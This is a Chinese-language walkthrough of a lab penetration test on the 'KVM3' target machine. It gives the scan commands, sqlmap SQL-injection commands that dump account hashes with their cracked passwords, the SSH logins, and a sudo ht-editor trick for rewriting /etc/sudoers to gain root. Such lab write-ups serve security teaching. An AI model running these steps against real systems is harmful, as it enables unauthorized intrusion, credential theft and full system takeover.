KVM3 靶机渗透测试与权限提升教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

IP地址: 192.168.8.100<\/li>
操作系统: Linux (Ubuntu\/Debian)<\/li>

开放服务:

SSH (22\/tcp) - OpenSSH 4.7p1<\/li>

HTTP (80\/tcp) - Apache 2.2.8 with PHP 5.2.4-2ubuntu5.6<\/li> <\/ul> <\/li> <\/ul>

1.2 服务扫描<\/h3>

使用Nmap进行全面扫描:<\/p>

nmap -p- -sV -sC 192.168.8.100 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>扫描结果分析:<\/p>

SSH版本较旧(OpenSSH 4.7p1)，可能存在漏洞<\/li>
Web服务器运行Apache 2.2.8，PHP 5.2.4，这些版本较旧可能有已知漏洞<\/li>
<\/ul>
1.3 目录枚举<\/h3>
使用dirsearch进行目录扫描:<\/p>
dirsearch -u "http:\/\/192.168.8.100\/"<\/span>
<\/span><\/span><\/code><\/pre>重要发现:<\/p>

\/gallery\/<\/code> - 图片画廊目录<\/li>
\/phpmyadmin\/<\/code> - phpMyAdmin管理界面<\/li>
\/modules\/<\/code> - 模块目录<\/li>
\/core\/fragments\/moduleInfo.phtml<\/code> - 可访问的模块信息文件<\/li>
<\/ul>
2. Web应用漏洞利用<\/h2>
2.1 识别Gallery应用<\/h3>
访问http:\/\/192.168.8.100\/gallery\/<\/code>发现Gallarific图片画廊应用<\/p>
2.2 搜索已知漏洞<\/h3>
searchsploit Gallarific
<\/span><\/span><\/code><\/pre>发现多个漏洞:<\/p>

SQL注入漏洞 (php\/webapps\/15891.txt)<\/li>
认证绕过漏洞 (php\/webapps\/31370.txt)<\/li>
管理员信息修改漏洞 (php\/webapps\/8796.html)<\/li>
<\/ol>
2.3 SQL注入利用<\/h3>
使用sqlmap进行自动化注入:<\/p>
# 枚举数据库<\/span>
<\/span><\/span>sqlmap -u "http:\/\/192.168.8.100\/gallery\/gallery.php?id=1"<\/span> --dbs --batch
<\/span><\/span>
<\/span><\/span># 枚举gallery数据库中的表<\/span>
<\/span><\/span>sqlmap -u "http:\/\/192.168.8.100\/gallery\/gallery.php?id=1"<\/span> -D gallery --tables --batch
<\/span><\/span>
<\/span><\/span># 转储dev_accounts表数据<\/span>
<\/span><\/span>sqlmap -u "http:\/\/192.168.8.100\/gallery\/gallery.php?id=1"<\/span> -D gallery -T dev_accounts --dump --batch
<\/span><\/span><\/code><\/pre>获取的凭据:<\/p>
+----+----------------------------------+------------+
| id | password                         | username   |
+----+----------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e | loneferret |
+----+----------------------------------+------------+
<\/code><\/pre>
密码哈希破解:<\/p>

dreg的密码哈希对应明文"Mast3r"<\/li>
loneferret的密码哈希对应明文"starwars"<\/li>
<\/ul>
3. 初始访问<\/h2>
3.1 SSH登录<\/h3>
使用获取的凭据尝试SSH登录:<\/p>
ssh dreg@192.168.8.100
<\/span><\/span># 密码: Mast3r<\/span>
<\/span><\/span>
<\/span><\/span>ssh loneferret@192.168.8.100
<\/span><\/span># 密码: starwars<\/span>
<\/span><\/span><\/code><\/pre>成功以loneferret用户登录系统<\/p>
3.2 获取本地标志<\/h3>
cat \/home\/loneferret\/Local.txt
<\/span><\/span># 内容: u28dt2i0<\/span>
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>输出:<\/p>
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !\/usr\/bin\/su
    (root) NOPASSWD: \/usr\/local\/bin\/ht
<\/code><\/pre>
分析:<\/p>

可以以root身份无密码运行\/usr\/local\/bin\/ht<\/code><\/li>
禁止以root身份运行\/usr\/bin\/su<\/code><\/li>
<\/ul>
4.2 检查ht编辑器<\/h3>
ls -la \/usr\/local\/bin\/ht
<\/span><\/span><\/code><\/pre>发现ht编辑器具有SUID位设置<\/p>
4.3 利用ht编辑器提权<\/h3>
4.3.1 解决终端问题<\/h4>
首次运行可能遇到终端错误:<\/p>
\/usr\/local\/bin\/ht
<\/span><\/span># 错误: Error opening terminal: xterm-256color<\/span>
<\/span><\/span><\/code><\/pre>解决方法:<\/p>
export TERM=<\/span>xterm
<\/span><\/span><\/code><\/pre>4.3.2 编辑sudoers文件<\/h4>

以root身份运行ht编辑器:<\/li>
<\/ol>
sudo \/usr\/local\/bin\/ht
<\/span><\/span><\/code><\/pre>

在ht编辑器中:<\/p>

按F3打开文件<\/li>
输入\/etc\/sudoers<\/code>并回车<\/li>
找到loneferret的用户权限配置<\/li>
修改为允许无限制sudo访问<\/li>
按F2保存文件<\/li>
<\/ul>
<\/li>

示例修改内容:<\/p>
<\/li>
<\/ol>
loneferret ALL=(ALL) NOPASSWD: ALL
<\/code><\/pre>
4.3.3 获取root shell<\/h4>
sudo \/bin\/bash
<\/span><\/span><\/code><\/pre>4.4 获取root标志<\/h3>
cat \/root\/Proot.txt
<\/span><\/span># 内容: d2ua8u2yd<\/span>
<\/span><\/span><\/code><\/pre>5. 关键知识点总结<\/h2>


信息收集<\/strong>:<\/p>

全面的端口扫描和服务识别是渗透测试的基础<\/li>
目录枚举可以发现隐藏的Web应用路径<\/li>
<\/ul>
<\/li>

漏洞利用<\/strong>:<\/p>

使用searchsploit查找已知应用漏洞<\/li>
sqlmap自动化SQL注入工具的使用<\/li>
密码哈希破解技术<\/li>
<\/ul>
<\/li>

权限提升<\/strong>:<\/p>

检查sudo -l查看可用特权命令<\/li>
利用具有SUID位的程序<\/li>
通过编辑器修改关键系统文件(如sudoers)实现提权<\/li>
终端环境变量问题的解决方法<\/li>
<\/ul>
<\/li>

防御建议<\/strong>:<\/p>

及时更新系统和应用软件<\/li>
限制sudo权限，避免无密码sudo<\/li>
移除不必要的SUID程序<\/li>
对编辑器等程序设置合理的权限<\/li>
<\/ul>
<\/li>
<\/ol>

KVM3 靶机渗透测试与权限提升教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用漏洞利用<\/h2>

2.1 识别Gallery应用<\/h3> 访问http:\/\/192.168.8.100\/gallery\/<\/code>发现Gallarific图片画廊应用<\/p>

3. 初始访问<\/h2>

4. 权限提升<\/h2>

4.3 利用ht编辑器提权<\/h3>

2.1 识别Gallery应用<\/h3>
访问`http:\/\/192.168.8.100\/gallery\/<\/code>发现Gallarific图片画廊应用<\/p>`